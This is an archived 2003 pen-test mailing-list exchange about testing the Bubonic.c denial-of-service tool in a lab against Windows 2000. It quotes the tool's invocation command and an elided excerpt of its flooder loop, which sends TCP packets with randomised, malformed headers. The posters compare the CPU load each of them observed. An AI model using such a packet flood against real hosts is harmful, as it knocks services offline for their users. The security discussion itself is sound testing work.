RE: Bubonic DoS tool

["Indian Tiger" <indiantiger () mailandnews com>]

Hi Yonatan,

Comments in-line
> To sum up and simplify, this sends TCP packets with bad header.
> As a result, my unpatched win2k's CPU graph stays over 90%
> in the kernel, causing Albinoni to sound bad.

I have tested thia again, it does collision but CPU is not going more than
5-8 percent.

Thanking You.
Sincerely,

Indian Tiger, CISSP


> -----Original Message-----
> From: Yonatan Bokovza [mailto:Yonatan () xpert com]
> Sent: Tuesday, March 11, 2003 3:40 PM
> To: Indian Tiger; pen-test () securityfocus com
> Cc: sil () antioffline com
> Subject: RE: Bubonic DoS tool
>
>
> > -----Original Message-----
> > From: Indian Tiger [mailto:indiantiger () mailandnews com]
> > Sent: Thursday, February 06, 2003 18:43
> > To: pen-test () securityfocus com
> > Cc: sil () antioffline com
> > Subject: Bubonic DoS tool
> >
> >
> > Hi All,
> >
> > I was testing the  "Bubonic.c lame DoS against Windows 2000
> > machines and
> > certain versions of Linux in a test scenario over Linux 8.0.
> > I have compiled
> > it's source code and running it's binary as follows:
> > # ./bubonic 10.3.10.22 10.3.8.70 100 1000
> > On executing the above command, there was no observable
> > immediate effect,
> > but the Hub was showing the collisions (which were the Red
> > Steady). Etherial
> > shows the packets routed to desination.
> > But after executing the command the destination machine must be
> > blocked/freeze, but it's not happening.
>
> The code is very easy to understand. The "interesting" part is
> in flooder(), my comments inline:
>
> void flooder(void)
> {
> ...
>     packet.ip.ip_p              = IPPROTO_TCP;
>     packet.ip.ip_tos            = rand();
> ...
>     packet.tcp.th_flags         = random();
>     packet.tcp.th_win           = 65535;
>     packet.tcp.th_seq           = random();
>     packet.tcp.th_ack           = 0;
>     packet.tcp.th_off           = 0;
>     packet.tcp.th_urp           = random();
>     packet.tcp.th_dport         = random();
> ...
>     cksum.pseudo.ptcl           = IPPROTO_TCP;
>     cksum.pseudo.tcpl           = random();
> ...
>     for(i=0;;++i) {
> ...
>        if (sendto(sock, &packet, sizeof(packet), 0, (struct
> sockaddr *)&s_in, sizeof(s_in)) < 0);
>     }
> }
>
> To sum up and simplify, this sends TCP packets with bad header.
> As a result, my unpatched win2k's CPU graph stays over 90%
> in the kernel, causing Albinoni to sound bad.
>
> Best Regards,
>
> Yonatan Bokovza
> IT Security Consultant
> Xpert Systems


----------------------------------------------------------------------------

Are your vulnerability scans producing just another report?
Manage the entire remediation process with StillSecure VAM's
Vulnerability Repair Workflow.
Download a free 15-day trial:
http://www2.stillsecure.com/download/sf_vuln_list.html